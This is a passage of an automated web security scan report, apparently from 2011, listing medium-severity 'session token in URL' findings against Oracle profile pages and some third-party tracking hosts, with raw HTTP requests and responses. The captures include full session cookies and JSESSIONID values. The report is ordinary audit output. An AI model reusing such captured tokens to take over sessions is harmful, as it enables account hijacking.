Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:22 GMT
Cache-Control: Public
Expires: Mon, 03 Sep 2012 16:14:22 GMT
Content-Type: image/gif
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186948280416951,1)
Last-Modified: Wed, 17 Feb 2010 07:54:50 GMT
Content-Length: 417

GIF89a..................................................................................................................................................................................................
...[SNIP]...

8.18. https://myprofile.oracle.com/EndUser/adf/images/t.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/adf/images/t.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://myprofile.oracle.com/EndUser/adf/images/t.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356

Request

GET /EndUser/adf/images/t.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:22 GMT
Cache-Control: Public
Expires: Mon, 03 Sep 2012 16:14:22 GMT
Content-Type: image/gif
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186935395515062,0)
Last-Modified: Wed, 17 Feb 2010 07:54:50 GMT
Content-Length: 86

GIF89a.......................................................!.......,........@...D.;

8.19. https://myprofile.oracle.com/EndUser/adf/jsLibs/Common1_2_12_1.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/adf/jsLibs/Common1_2_12_1.js

Issue detail

The URL in the request appears to contain a session token within the query string:

https://myprofile.oracle.com/EndUser/adf/jsLibs/Common1_2_12_1.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356

Request

GET /EndUser/adf/jsLibs/Common1_2_12_1.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:20 GMT
Cache-Control: Public
Expires: Mon, 03 Sep 2012 16:14:20 GMT
Content-Type: application/x-javascript
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186664812572695,0)
Last-Modified: Wed, 17 Feb 2010 07:54:50 GMT
Content-Length: 183096

var _byteLenKey="org.apache.myfaces.trinidad.validator.ByteLengthValidator.MAXIMUM";
function TrByteLengthValidator(
a0,
a1
)
{
this._length=a0;
this._messages=a1;
this._class="TrByteLengthValidator";
...[SNIP]...

8.20. https://myprofile.oracle.com/EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css

Issue detail

The URL in the request appears to contain a session token within the query string:

https://myprofile.oracle.com/EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356

Request

GET /EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:07:15 GMT
Cache-Control: Public
Expires: Mon, 03 Sep 2012 16:07:16 GMT
Last-Modified: Fri, 05 Aug 2011 05:00:27 GMT
Content-Type: text/css
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=109;ecid=30186720647148143,0)
Content-Length: 31848

/* This CSS file generated on Thu Aug 04 22:00:27 PDT 2011 */
.AFInstructionText,.x0,.AFFieldText,.x6,.xk,.xl,.xm,.x23,.x24,.x25,.x26,.x2a,.x2b,.x2c,.x2d,.x2e,.x2f,.x2g,.x2h,.x2i,.x2j,.x1u.x2n .x25,.x
...[SNIP]...

8.21. https://myprofile.oracle.com/EndUser/images/fading-background.png previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/images/fading-background.png

Issue detail

The URL in the request appears to contain a session token within the query string:

https://myprofile.oracle.com/EndUser/images/fading-background.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422

Request

GET /EndUser/images/fading-background.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/findUsername.jspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_cc=true; s_nr=1315343797232; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleblogs%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:16:38 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30195555395017574,0)
Last-Modified: Fri, 11 Feb 2011 22:10:22 GMT
Content-Length: 164

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...FIDATx.b......01..(.x.....G.;.....QW~....h,.....FK...l$..._.}..:... ....G...U.....IEND.B`.

8.22. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/images/logo-oracle-red.png

Issue detail

The URL in the request appears to contain a session token within the query string:

https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422

Request

GET /EndUser/images/logo-oracle-red.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:21 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186767891789108,1)
Last-Modified: Thu, 29 Oct 2009 05:53:52 GMT
Content-Length: 908

.PNG
.
...IHDR...w...........&.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....Q*A.......d .H....H.b.b.d f..`.....p....a.=M ..{..........g.t..].Sd...]...D..d.3.............|.....
...[SNIP]...

8.23. https://myprofile.oracle.com/EndUser/jscripts/s_code.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_code.js

Issue detail

The URL in the request appears to contain a session token within the query string:

https://myprofile.oracle.com/EndUser/jscripts/s_code.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356

Request

GET /EndUser/jscripts/s_code.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

8.24. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_code_popup.js

Issue detail

The URL in the request appears to contain a session token within the query string:

https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356

Request

GET /EndUser/jscripts/s_code_popup.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:38 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 28 Mar 2011 10:28:50 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=161;ecid=30186686287409627,0)
Content-Length: 233

var popupWindow = null;
var flag = 0;

function openPopup(url)
{
try
{
popupWindow = window.open(url, "popup_id", "scrollbars,resizable,width=800,height=600");
}
catch (err)
{
flag = '1' +
...[SNIP]...

8.25. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_code_profile.js

Issue detail

The URL in the request appears to contain a session token within the query string:

https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356

Request

GET /EndUser/jscripts/s_code_profile.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:29:47 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 14 Jul 2010 22:00:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=249;ecid=30186699172311517,0)
Content-Length: 1366

/* Setting the s_account */
function s_setAccount(){

var s_account="";

var curUrl = location.href;

if(curUrl.indexOf(":7101") != -1 || curUrl.indexOf("-mktad") != -1 || curUrl.index
...[SNIP]...

8.26. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_validation.js

Issue detail

The URL in the request appears to contain a session token within the query string:

https://myprofile.oracle.com/EndUser/jscripts/s_validation.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356

Request

GET /EndUser/jscripts/s_validation.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:09:35 GMT
Accept-Ranges: bytes
Last-Modified: Fri, 18 Mar 2011 13:50:52 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=242;ecid=30186729237082835,0)
Content-Length: 4274

/* Used to attach and remove error message which are not set or removed on
* server side validators.
*/
function checkOnLoad()
{
var inputs = document.getElementsByTagName('input');
var spans =
...[SNIP]...

8.27. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://netsuite.tt.omtrdc.net
Path:	/m2/netsuite/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40 HTTP/1.1
Host: netsuite.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315341135013-154927.19; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 20-Sep-2011 15:32:28 GMT; Path=/m2/netsuite
Content-Type: text/javascript
Content-Length: 173
Date: Tue, 06 Sep 2011 15:32:27 GMT
Server: Test & Target

mboxFactories.get('default').get('me-ecomm-form-test',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315341135013-154927.19");

8.28. http://www.apture.com/js/apture.js previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.apture.com
Path:	/js/apture.js

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.apture.com/js/apture.js?siteToken=H0arRY0

Request

GET /js/apture.js?siteToken=H0arRY0 HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=FQtL8KWd11

Response

HTTP/1.0 200 OK
Content-Length: 2642
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:33:01 GMT

(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://www.readwriteweb.com/enterprise/2010/11/oracle.php";A.visitId="a0e3f59a335046f79ededb918544b382";A.u
...[SNIP]...

8.29. http://www.atg.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.atg.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.atg.com/en/products-services/education/schedule/?_DARGS=/en/includes/common/main-navigation.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+

Request

GET / HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
